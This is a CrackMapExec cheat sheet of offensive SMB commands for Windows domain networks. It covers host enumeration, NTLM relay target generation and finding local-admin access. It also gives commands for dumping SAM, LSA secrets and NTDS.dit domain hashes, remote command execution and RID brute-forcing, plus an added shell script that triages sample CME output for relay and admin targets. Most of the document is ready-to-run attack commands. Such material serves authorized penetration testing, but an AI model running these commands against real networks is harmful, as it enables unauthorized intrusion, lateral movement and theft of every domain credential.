CrackMapExec

Find IP/hostname/OS/domain/SMB signing status/etc (no creds needed):

crackmapexec smb targets.txt

Generate a list of hosts with SMB signing disabled (not required) for NTLM relay:

crackmapexec smb targets.txt --gen-relay-list relay.txt

Find hosts the user can log into / is local admin on (admin hosts are marked Pwn3d!):

crackmapexec smb targets.txt -u user -p 'password'
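The three commands above are usually run against a whole subnet and then the output is sorted by hand. The script below is an added example, not part of the original cheat sheet or of the CrackMapExec project: it takes saved cme output (e.g. `crackmapexec smb targets.txt -u user -p 'password' | tee cme.log`) and pulls out the relay candidates (signing:False), the hosts where the credential is local admin (Pwn3d!) and the hosts where it is merely valid. The sample output embedded in CME_OUTPUT is constructed to match cme's line format; the IPs, hostnames and domain are made up.

```sh
#!/bin/sh
# Added example: triage CrackMapExec SMB output. Not code from the original page.
# Sample cme output below is CONSTRUCTED (fictional hosts) but follows the real
# column layout: PROTO  IP  PORT  HOSTNAME  [status]  message
CME_OUTPUT='SMB         10.10.10.10     445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.20     445    FS01             [*] Windows 10.0 Build 19041 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.30     445    WS07             [*] Windows 10.0 Build 19041 x64 (name:WS07) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.10     445    DC01             [+] corp.local\user:password
SMB         10.10.10.20     445    FS01             [+] corp.local\user:password (Pwn3d!)
SMB         10.10.10.30     445    WS07             [-] corp.local\user:password STATUS_LOGON_FAILURE'

# All functions read cme output on stdin and print one IP per line, de-duplicated.

# Hosts that do not require SMB signing: the same set --gen-relay-list would write.
relay_targets() {
    awk '$5 == "[*]" && /\(signing:False\)/ { print $2 }' | sort -u
}

# Hosts where the credential is local admin (cme appends "(Pwn3d!)" to the [+] line).
admin_hosts() {
    awk '$5 == "[+]" && /\(Pwn3d!\)/ { print $2 }' | sort -u
}

# Hosts where the credential logs in but is NOT admin: --shares is about all you get there.
valid_nonadmin_hosts() {
    awk '$5 == "[+]" && !/Pwn3d!/ { print $2 }' | sort -u
}

# Hosts that still speak SMBv1: worth noting, they are often the least patched boxes.
smbv1_hosts() {
    awk '$5 == "[*]" && /\(SMBv1:True\)/ { print $2 }' | sort -u
}

# Demo run over the constructed sample. With real output: relay_targets < cme.log > relay.txt
echo "== relay targets (signing not required) =="; printf '%s\n' "$CME_OUTPUT" | relay_targets
echo "== local admin =="; printf '%s\n' "$CME_OUTPUT" | admin_hosts
echo "== valid, not admin =="; printf '%s\n' "$CME_OUTPUT" | valid_nonadmin_hosts
echo "== SMBv1 enabled =="; printf '%s\n' "$CME_OUTPUT" | smbv1_hosts
```

`relay_targets < cme.log > relay.txt` gives the same file `--gen-relay-list` produces and can be fed straight to ntlmrelayx's `-tf`. Matching on column 5 (`[*]`, `[+]`, `[-]`) rather than grepping the whole line keeps a hostname or share name containing the word "signing" from producing false hits.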

Enumerate shares

crackmapexec smb ip -u user -p 'password' --shares

Dump SAM (local account hashes, needs local admin):

crackmapexec smb ip -u user -p 'password' --sam

Dump LSA secrets (cached creds, service account passwords, needs local admin):

crackmapexec smb ip -u user -p 'password' --lsa

Run a cmd.exe command:

crackmapexec smb ip -u user -p 'password' -x 'command'

Run a PowerShell command:

crackmapexec smb ip -u user -p 'password' -X 'command'

Enumerate domain users by RID brute-force if the Guest account is enabled (empty password):

crackmapexec smb ip -u 'Guest' -p '' --rid-brute

List Domain Admins:

crackmapexec smb ip -u user -p 'password' -x 'net group "Domain Admins" /domain'

List logged-on users (needs local admin; useful for finding where DA sessions are):

crackmapexec smb ip -u user -p 'password' --loggedon-users

Dump NTDS.dit from a domain controller (every domain hash) - is LOUD - USE WITH CAUTION

crackmapexec smb dc-ip -u domain-admin-user -p 'password' --ntds
